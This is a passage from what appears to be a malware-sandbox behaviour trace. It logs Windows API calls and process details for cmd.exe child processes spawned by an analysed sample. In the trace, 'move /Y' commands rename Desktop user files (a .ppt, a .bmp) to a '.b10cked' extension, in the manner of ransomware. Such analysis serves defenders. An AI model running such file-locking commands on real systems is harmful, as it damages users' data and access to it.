lpData=0x28e6e8*=0x1, lpcbData=0x28e6e0*=0x1000) returned 0x2 [0231.972] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x28e6e4, 
lpData=0x28e6e8, lpcbData=0x28e6e0*=0x1000 | out: lpType=0x28e6e4*=0x4, lpData=0x28e6e8*=0x0, lpcbData=0x28e6e0*=0x4) returned 0x0 [0231.972] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x28e6e4, lpData=0x28e6e8, lpcbData=0x28e6e0*=0x1000 | out: lpType=0x28e6e4*=0x4, lpData=0x28e6e8*=0x9, lpcbData=0x28e6e0*=0x4) returned 0x0 [0231.972] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x28e6e4, lpData=0x28e6e8, lpcbData=0x28e6e0*=0x1000 | out: lpType=0x28e6e4*=0x4, lpData=0x28e6e8*=0x9, lpcbData=0x28e6e0*=0x4) returned 0x0 [0231.972] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x28e6e4, lpData=0x28e6e8, lpcbData=0x28e6e0*=0x1000 | out: lpType=0x28e6e4*=0x0, lpData=0x28e6e8*=0x9, lpcbData=0x28e6e0*=0x1000) returned 0x2 [0231.972] RegCloseKey (hKey=0x40) returned 0x0 [0231.972] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863bf [0231.972] srand (_Seed=0x5b8863bf) [0231.972] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\TWV414~1.PPT\" \"C:\\Users\\EEBsYm5\\Desktop\\tWV414DCFHSA.ppt.b10cked\"" [0231.972] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\TWV414~1.PPT\" \"C:\\Users\\EEBsYm5\\Desktop\\tWV414DCFHSA.ppt.b10cked\"" [0231.973] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0231.973] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xa18c8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0231.973] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0231.973] GetEnvironmentVariableW (in: 
lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0231.973] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0231.973] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0231.973] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0231.973] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0231.973] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0231.974] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0231.974] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0231.974] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0231.974] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0231.974] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0231.974] GetEnvironmentStringsW () returned 0xa22b8* [0231.974] FreeEnvironmentStringsW (penv=0xa22b8) returned 1 [0231.974] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0231.974] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0231.974] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0231.974] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0231.974] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0231.974] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0231.974] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0231.974] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0231.974] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0231.974] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0231.974] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x28f4a8 | out: 
lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0231.974] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x28f4a8, lpFilePart=0x28f4a4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x28f4a4*="Desktop") returned 0x18 [0231.975] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0231.975] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x28f224 | out: lpFindFileData=0x28f224) returned 0x9fff8 [0231.975] FindClose (in: hFindFile=0x9fff8 | out: hFindFile=0x9fff8) returned 1 [0231.975] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x28f224 | out: lpFindFileData=0x28f224) returned 0x9fff8 [0231.975] FindClose (in: hFindFile=0x9fff8 | out: hFindFile=0x9fff8) returned 1 [0231.975] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x28f224 | out: lpFindFileData=0x28f224) returned 0x9fff8 [0231.976] FindClose (in: hFindFile=0x9fff8 | out: hFindFile=0x9fff8) returned 1 [0231.976] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0231.976] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0231.976] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0231.976] GetEnvironmentStringsW () returned 0xa2ad8* [0231.976] FreeEnvironmentStringsW (penv=0xa2ad8) returned 1 [0231.976] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0231.977] GetConsoleOutputCP () returned 0x1b5 [0231.979] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0231.979] GetUserDefaultLCID () returned 0x409 [0231.995] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 
2 [0231.996] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x28f5e8, cchData=128 | out: lpLCData="0") returned 2 [0231.996] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x28f5e8, cchData=128 | out: lpLCData="0") returned 2 [0231.996] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x28f5e8, cchData=128 | out: lpLCData="1") returned 2 [0231.996] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0231.996] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0231.997] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0231.997] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0231.997] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0231.997] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0231.997] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0231.997] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0231.997] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0231.997] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0231.997] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0231.998] GetConsoleTitleW (in: lpConsoleTitle=0x908d0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0232.041] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0232.041] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c 
[0232.041] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0232.042] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0232.042] _wcsicmp (_String1="move", _String2=")") returned 68 [0232.043] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0232.043] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0232.043] _wcsicmp (_String1="IF", _String2="move") returned -4 [0232.043] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0232.043] _wcsicmp (_String1="REM", _String2="move") returned 5 [0232.043] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0232.046] GetConsoleTitleW (in: lpConsoleTitle=0x28f2e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0232.137] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0232.137] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0232.137] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0232.137] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0232.137] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0232.137] _wcsicmp (_String1="move", _String2="CD") returned 10 [0232.137] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0232.137] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0232.137] _wcsicmp (_String1="move", _String2="REN") returned -5 [0232.137] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0232.137] _wcsicmp (_String1="move", _String2="SET") returned -6 [0232.137] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0232.137] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0232.137] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0232.137] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0232.137] _wcsicmp (_String1="move", _String2="MD") returned 11 [0232.137] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0232.137] _wcsicmp (_String1="move", _String2="RD") 
returned -5 [0232.137] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0232.137] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0232.137] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0232.137] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0232.137] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0232.137] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0232.137] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0232.137] _wcsicmp (_String1="move", _String2="VER") returned -9 [0232.137] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0232.137] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0232.137] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0232.137] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0232.137] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0232.137] _wcsicmp (_String1="move", _String2="START") returned -6 [0232.137] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0232.137] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0232.137] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0232.139] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0232.139] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0232.139] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x28f09c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x28f094, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x28f094*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0232.139] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0232.139] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0232.139] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0232.139] _wcsnicmp 
(_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0232.139] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0232.139] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0232.139] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0232.139] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0232.139] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0232.139] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0232.139] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0232.139] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0232.139] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0232.140] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0232.140] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0232.140] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0232.140] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0232.140] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0232.140] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0232.140] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0232.140] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0232.140] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0232.140] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0232.140] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0232.140] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0232.140] _wcsnicmp (_String1="COPYCMD", 
_String2="SystemR", _MaxCount=0x7) returned -16 [0232.140] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0232.140] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0232.140] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0232.140] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0232.140] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0232.140] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0232.140] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0232.140] _wcsicmp (_String1="TWV414~1.PPT", _String2=".") returned 70 [0232.140] _wcsicmp (_String1="TWV414~1.PPT", _String2="..") returned 70 [0232.140] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\TWV414~1.PPT" (normalized: "c:\\users\\eebsym5\\desktop\\twv414~1.ppt")) returned 0x20 [0232.141] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xa1d40 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0232.141] SetErrorMode (uMode=0x0) returned 0x0 [0232.141] SetErrorMode (uMode=0x1) returned 0x0 [0232.141] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\TWV414~1.PPT", nBufferLength=0x104, lpBuffer=0x28ea24, lpFilePart=0x28ea0c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\TWV414~1.PPT", lpFilePart=0x28ea0c*="TWV414~1.PPT") returned 0x25 [0232.141] SetErrorMode (uMode=0x0) returned 0x1 [0232.141] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0232.141] _wcsicmp (_String1="TWV414~1.PPT", _String2=".") returned 70 [0232.141] _wcsicmp (_String1="TWV414~1.PPT", _String2="..") returned 70 [0232.141] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\TWV414~1.PPT" (normalized: "c:\\users\\eebsym5\\desktop\\twv414~1.ppt")) returned 0x20 [0232.141] SetErrorMode (uMode=0x0) returned 0x0 
[0232.141] SetErrorMode (uMode=0x1) returned 0x0 [0232.141] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\TWV414~1.PPT", nBufferLength=0x104, lpBuffer=0x28eea0, lpFilePart=0x28ec38 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\TWV414~1.PPT", lpFilePart=0x28ec38*="TWV414~1.PPT") returned 0x25 [0232.141] SetErrorMode (uMode=0x0) returned 0x1 [0232.141] SetErrorMode (uMode=0x0) returned 0x0 [0232.141] SetErrorMode (uMode=0x1) returned 0x0 [0232.141] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\tWV414DCFHSA.ppt.b10cked", nBufferLength=0x104, lpBuffer=0x28f0a8, lpFilePart=0x28ec38 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\tWV414DCFHSA.ppt.b10cked", lpFilePart=0x28ec38*="tWV414DCFHSA.ppt.b10cked") returned 0x31 [0232.141] SetErrorMode (uMode=0x0) returned 0x1 [0232.141] SetLastError (dwErrCode=0x0) [0232.141] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\tWV414DCFHSA.ppt.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\twv414dcfhsa.ppt.b10cked")) returned 0xffffffff [0232.141] GetLastError () returned 0x2 [0232.142] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\TWV414~1.PPT", fInfoLevelId=0x1, lpFindFileData=0x28e5b4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28e5b4) returned 0x90ef8 [0232.142] FindNextFileW (in: hFindFile=0x90ef8, lpFindFileData=0x28e5b4 | out: lpFindFileData=0x28e5b4) returned 0 [0232.142] GetLastError () returned 0x12 [0232.142] FindClose (in: hFindFile=0x90ef8 | out: hFindFile=0x90ef8) returned 1 [0232.143] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\TWV414~1.PPT", fInfoLevelId=0x1, lpFindFileData=0xa1ae0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa1ae0) returned 0x90ef8 [0232.356] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\tWV414DCFHSA.ppt.b10cked", nBufferLength=0x104, lpBuffer=0x28e84c, lpFilePart=0x0 | out: 
lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\tWV414DCFHSA.ppt.b10cked", lpFilePart=0x0) returned 0x31 [0232.356] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\tWV414DCFHSA.ppt", nBufferLength=0x104, lpBuffer=0x28e84c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\tWV414DCFHSA.ppt", lpFilePart=0x0) returned 0x29 [0232.356] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\tWV414DCFHSA.ppt" (normalized: "c:\\users\\eebsym5\\desktop\\twv414dcfhsa.ppt")) returned 0x20 [0232.356] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\Desktop\\tWV414DCFHSA.ppt" (normalized: "c:\\users\\eebsym5\\desktop\\twv414dcfhsa.ppt"), lpNewFileName="C:\\Users\\EEBsYm5\\Desktop\\tWV414DCFHSA.ppt.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\twv414dcfhsa.ppt.b10cked"), dwFlags=0x3) returned 1 [0232.369] FindClose (in: hFindFile=0x90ef8 | out: hFindFile=0x90ef8) returned 1 [0232.369] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x28e800 | out: _Buffer=" 1") returned 9 [0232.369] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.369] GetFileType (hFile=0x7) returned 0x2 [0232.370] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0232.370] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28e78c | out: lpMode=0x28e78c) returned 1 [0232.370] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.370] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x28e7c0 | out: lpConsoleScreenBufferInfo=0x28e7c0) returned 1 [0232.370] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0232.371] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x28e800 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0232.371] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, 
nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x28e7e4, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x28e7e4*=0x1a) returned 1 [0232.371] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.371] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0232.371] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.371] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0232.372] _get_osfhandle (_FileHandle=0) returned 0x3 [0232.372] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0232.372] SetConsoleInputExeNameW () returned 0x1 [0232.372] GetConsoleOutputCP () returned 0x1b5 [0232.372] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0232.372] SetThreadUILanguage (LangId=0x0) returned 0x409 [0232.372] exit (_Code=0) Process: id = "614" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16da0" os_pid = "0x9c4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\VX2E_A~1.BMP\" \"C:\\Users\\EEBsYm5\\Desktop\\VX2e_AgjuFQyd1Woq.bmp.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 34415 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 34416 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 
region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 34417 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 34418 start_va = 0x170000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 34419 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 34420 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 34421 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 34422 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 34423 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 34424 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 34651 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 34652 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 34653 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = 
"\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 34654 start_va = 0xf0000 end_va = 0xfffff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 34655 start_va = 0x2b0000 end_va = 0x3affff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 34656 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 34657 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 34658 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 34659 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 34660 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 34661 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 34662 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 34663 
